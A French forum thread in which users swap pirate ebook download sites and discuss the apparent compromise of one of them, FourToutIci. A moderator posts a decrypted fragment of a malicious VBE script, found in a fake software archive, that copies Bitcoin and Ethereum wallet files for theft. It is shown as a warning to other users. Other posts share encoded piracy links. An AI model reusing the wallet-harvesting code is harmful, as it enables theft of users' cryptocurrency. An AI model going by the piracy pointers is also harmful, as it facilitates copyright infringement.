[RECHERCHE] Site de téléchargement ebooks gratuits

Vous recherchez un programme, une solution, posez votre question ici.
LaDidi21
Modérateur
Modérateur

Message par LaDidi21 »

@aLL :
Sur FourToutIci, j'ai juste vérifié "LOGiCiEL Encyclopedia Universalis 2022 pre-active.zip".
Aie, aie ,aie !
2 vbe, qui après décrypt, donne :

Code : Tout sélectionner

...
if objFSO.FileExists(appdata+"\Bitcoin\wallet.dat") then
	objFSO.CreateFolder(temp+"\wallets\Bitcoin")
	objFSO.CopyFile appdata+"\Bitcoin\wallet.dat",temp+"\wallets\Bitcoin\wallet.dat"
end if

if objFSO.FolderExists(appdata+"\Ethereum\keystore") then
	objFSO.CreateFolder(temp+"\wallets\Ethereum")
	objFSO.CopyFolder appdata+"\Ethereum\keystore",temp+"\wallets\Ethereum\"
end if

if objFSO.FolderExists(localappdata+"\Ethereum\keystore") then
	objFSO.CreateFolder(temp+"\wallets\Ethereum")
	objFSO.CopyFolder localappdata+"\Ethereum\keystore",temp+"\wallets\Ethereum\"
end if
...

-> Décryptage des liens du forum : extension "ThiWeb Crypt / Decrypt"™ ou Thiweb Live <-

nenyp
Dieu
Dieu

Message par nenyp »

Merci à vous !

Un site qui porte bien son nom...
Windows 11 24H2 26100.3037
Système d’exploitation 64 bits
GeForce GTX 1070
Onclebob
Nouveau
Nouveau

Message par Onclebob »

Bonsoir à tous,

Effectivement, les liens proposés ne sont pas habituels ; très peu de choix et des intitulés qui questionnent ; il y a un gros problème avec Fourtoutici qui, une nouvelle fois à été l'objet je crois d'un piratage de son serveur ; cela est déjà arrivé il y a peu
En espérant que ce site essentiel trouve une fois encore l'énergie et les ressources nécessaires pour surmonter ces emmerdements à répétition...
Onclebob
Bill_Boquet
Grand Habitué
Grand Habitué

Message par Bill_Boquet »

Merci à tous pour vos réponses à propos de fourtoutici. Espérons en effet le retour du phoenix.
dee-pee
Habitué
Habitué

Message par dee-pee »

Bill_Boquet a écrit : il y a 2 ans Merci à tous pour vos réponses à propos de fourtoutici. Espérons en effet le retour du phœnix.
Tel le phœnix ... il semblerait que le site soit revenu à la "normale" depuis ce dimanche 15 mai.
LaDidi21
Modérateur
Modérateur

Message par LaDidi21 »

@dee-pee :
Tu es sûr de ce que tu avances :flushed: ?
modal (08:31): Bonjour à tous, ne téléchargez rien ici tant qu'un admin ou modo, ne vous le dira pas, tous les fichiers sont infesté !! Ne prenez rien ici !!!!
...
modal (07:54): Bonjour à tous, un conseil, ne téléchargez rien ici, tant qu'un modo ou un admin ne vous le dira pas. ne prenez pas de risque pour un livre que vous trouverez facilement ailleurs.
A moins que ce soit un amateur de beu ^^

-> Décryptage des liens du forum : extension "ThiWeb Crypt / Decrypt"™ ou Thiweb Live <-

dee-pee
Habitué
Habitué

Message par dee-pee »

LaDidi21 a écrit : il y a 2 ans @dee-pee :
Tu es sûr de ce que tu avances :flushed: ?
..../...
Déjà, j'ai employé le conditionnel ;)
Et à ce soir, vu le nombre de partage d'ebooks (je ne parle pas des PDF ou DOC ou ZIP/RAR) proposés dans la journée, je pense que ça devrait être bon :)
Pendant les 6/7 jours "piratés" il n'y guère eu de matériels mis à dispo sauf des ZIP/RAR.

A suivre !!
LaDidi21
Modérateur
Modérateur

Message par LaDidi21 »

@dee-pee :
Effectivement, j'avais mal lu en ne voyant pas l’utilisation du conditionnel.

Onclebob
Nouveau
Nouveau

Message par Onclebob »

Bonjour à tous,

Effectivement, le site Fourtoutici semble avoir retrouvé un fonctionnement "normal" ; je n'ai pas réellement compris l'origine du blocage, mais à la lecture des messages, il semblerait y avoir quelques tensions internes entre "responsables" et qui auraient provoquées cet arrêt et ou piratage ; volontaire ou pas ; autrement dit provoqué ou subit ??
Il y a maintenant une pub récurrente et un peu chiante qui illustre le changement de doctrine du site ; pour autant ça fonctionne ; j'ai téléchargé des fichiers PDF et EPUB sans soucis.
Une alternative intéressante :

TWL2.3F2D6F636E237B6F6F62656D23797B6F6F626E2237777F2F2A3370747478 6
Mais les téléchargements ne sont pas directs, il faut alors disposer d'un abonnement type 1 fichier afin de pouvoir profiter pleinement (et à grande vitesse) d'une offre conséquente.

Autre site qui a jeté l'éponge : Zone téléchargement.
Une autre alternative :

TWL2.3F2465627E25627961657E6E616D256E6F6A7E2777777F2F2A3370747478 6
Un peu de pub mais rien de rédhibitoire

Bonne journée

Onclebob
Dernière modification par LaDidi21 il y a 2 ans, modifié au total 1 fois.
Raison : Prière de crypter les liens de ce type
LaDidi21
Modérateur
Modérateur

Message par LaDidi21 »

@Onclebob :
Pour le 2ème lien, c'est du leech de WaWaCity.

Bill_Boquet
Grand Habitué
Grand Habitué

Merci à tous pour le suivi. Fourtoutici semble en effet de retour à la normale, mais sans l'habituelle balise modérateurs (ne rien prendre au-dessus). Pour info, les pubs intempestives existaient déjà depuis quelques mois.
Pour le 2e lien de @Onclebob, je serais prudent. Zone-telechargement est en effet mort et s'est appelé auapravant annuaire-téléchargement. Attention aux fakes !
Onclebob
Nouveau
Nouveau

Message par Onclebob »

Bis repetita, Fourtoutici est de nouveaux parti en vrille assez rapidement ; ce qui augure mal de l'avenir de ce site ; à suivre une fois encore en espérant des jours meilleurs...

Bonne journée à tous

Onclebob
Fanch
Petit Nouveau
Petit Nouveau

Message par Fanch »

Essayez ceci :

TWL2.3F22766E22696C613F2F2A33707474786
Fanch
Petit Nouveau
Petit Nouveau

Message par Fanch »

Ou cela (il y a une section ebook) :

TWL2.3F2D6F636E28796C66616071607F2F2A33707474786
LaDidi21
Modérateur
Modérateur

Message par LaDidi21 »

@Fanch :
Je viens de tester un download sur PapaFlix : je ne passe pas la redirection hyipstats.net :thumbsdown:
Popup : "Merci de désactiver votre adblock..."... alors que je n'en ai pas.
Test réalisé FF et EDGE.

ScapO
Modérateur
Modérateur

Message par ScapO »

@LaDidi,

j'ai testé , ( d'ailleurs Papaflix c'est l'ex Tirexo) avec uBlockOrigin la même demande que pour toi , uBlockOrigin neutralisé ça passe et amène vers le lien souhaité.
Test sous FF.
I won't take no prisoners, won't spare no lives
Nobody's putting up a fight
I got my bell, I'm gonna take you to hell
I'm gonna get you, Satan get you

--> Décryptage des liens du forum : ThiWeb Live
nenyp
Dieu
Dieu

Message par nenyp »

Pas de problème chez moi non plus sur Chrome
GeForce GTX 1070
LaDidi21
Modérateur
Modérateur

Message par LaDidi21 »

@ScapO & @nenyp :
Bizarre, ne passe pas sur FF 100.0.2 ni sur EDGE 101.0.1210.32 & .53 et je n'ai pas de bloqueur.
Je tourne sous SandBoxie mais ce n'est pas la cause car j'ai le même problème hors SandBox...
Par contre, passe dans une VM W10-21H2 avec EDGE 101.0.1210.47 :pensive:

Explication : Mon fichier hosts est trop filtrant :warning:

nenyp
Dieu
Dieu

Message par nenyp »

@LaDidi21

Sur FF 100.0.2 ça passe aussi chez moi (captcha et lien ensuite)
GeForce GTX 1070
dee-pee
Habitué
Habitué

Message par dee-pee »

Merci pour le lien vers PapaFlix !

Pour "contourner" le problème hyipstats.net, dans FF, j'ouvre les liens 1fichier ou Uptobox dans une fenêtre de navigation privée (clic droit, ...) et donc plus de pub/cookies/et autres traceurs et affichage du captcha très rapide.
LaDidi21
Modérateur
Modérateur

Message par LaDidi21 »

@nenyp :
Merci pour le test... mais comme la cause est le fichier hosts, n'importe quel navigateur aura le problème.
J'aurais du y penser dans la mesure où les 2 navigateurs dysfonctionnaient :pensive:
________________________________________________________________________________

@dee-pee :
Si le contournement m'est dédié, cela ne fonctionnera pas + car c'est le contenu du fichier hosts qui pose problème.

Onclebob
Nouveau
Nouveau

Message par Onclebob »

Bonjour,

Le site Fourtoutici semble de nouveau fonctionnel ; mais, à la lecture des messages du chat il y a bien un problème interne avec la possibilité de télécharger des fichiers vérolés ; sur fond d'un conflit "d'intérêt" avec un des administrateurs si j'ai bien tout compris.
En attendant des jours meilleurs, je ne télécharge rien pour le moment car la prudence s'impose ; enfin je crois
Bonne soirée
Onclebob
nguyen
Nouveau
Nouveau

Message par nguyen »

perso, je télécharge mes journaux sur fourtoutici.
Peut on avoir un virus en ouvrant un pdf?
Je transfère mes pdf sur ma tablette en android et je les lis avec moonreader.
Onclebob
Nouveau
Nouveau

Message par Onclebob »

Voici quelques extraits du chat pour vous permettre de prendre la mesure du "problème" Fourtoutici ; quant à savoir si les fichiers pdf et epub peuvent s'avérer vérolés, dans le doute je préfère m'abstenir...

dderty (06:51): Un PDF peut être dangereux, il suffit de taper pdf malveillant sur google. Perso je ne télécharge plus rien sur ce site par manque de confiance.
feyre (02:59): • Et une bonne fois pour toutes, les louanges aux admins faut arrêter. Votre chère Lafsand a déserté sans un mot et - surtout - sans daigner mettre le site hors ligne pour mettre en sécurité les utilisateurs de Fourtou...
feyre (02:56): Alors par pitié utilisez vos neurones et rendez vous un peu utiles en cessant de faire vivre ce site si vous espérez pouvoir le retrouver un jour, pensez bien que le jour où ça ne sera plus rentable pour lui il se barrera.
feyre (02:53): Il n'y a personne à remercier il n'y a qu'à arrêter de télécharger et de poster, tant que des idiots ou des naïfs continueront le hackeur restera, un peu de bon sens suffit à le comprendre. C'est pas faute de répéter les choses tous les jours
feyre (02:52): Le site est TOUJOURS piraté, le hackeur lâche juste la bride quelques heures partout, très certainement pour donner l'impression que le site est encore en vie. En tombant dans le panneau vous ne faites que l'engraisser davantage, réfléchissez un peu
feyre (02:50): Arrêtez avec vos " soulagé que ça refonctionne " sérieusement... Ca ne refonctionne PAS. Et ce depuis un mois et demi, arrêtez de remercier les admins et les modos qui ont déserté et qui n'ont pas pointé le bout de leur nez depuis des semaines.

Bonne journée
LaDidi21
Modérateur
Modérateur

Message par LaDidi21 »

@nguyen :
Oui
________________________________________________________________________________

@Onclebob :
On s'en fout un peu de FourToutIci, ici !

Onclebob
Nouveau
Nouveau

Message par Onclebob »

Ok bien reçu ; juste pour info ; c'est qui on ??
Joselito
Modérateur
Modérateur

Message par Joselito »

@Onclebob,
Nous.
Bill_Boquet
Grand Habitué
Grand Habitué

Répondre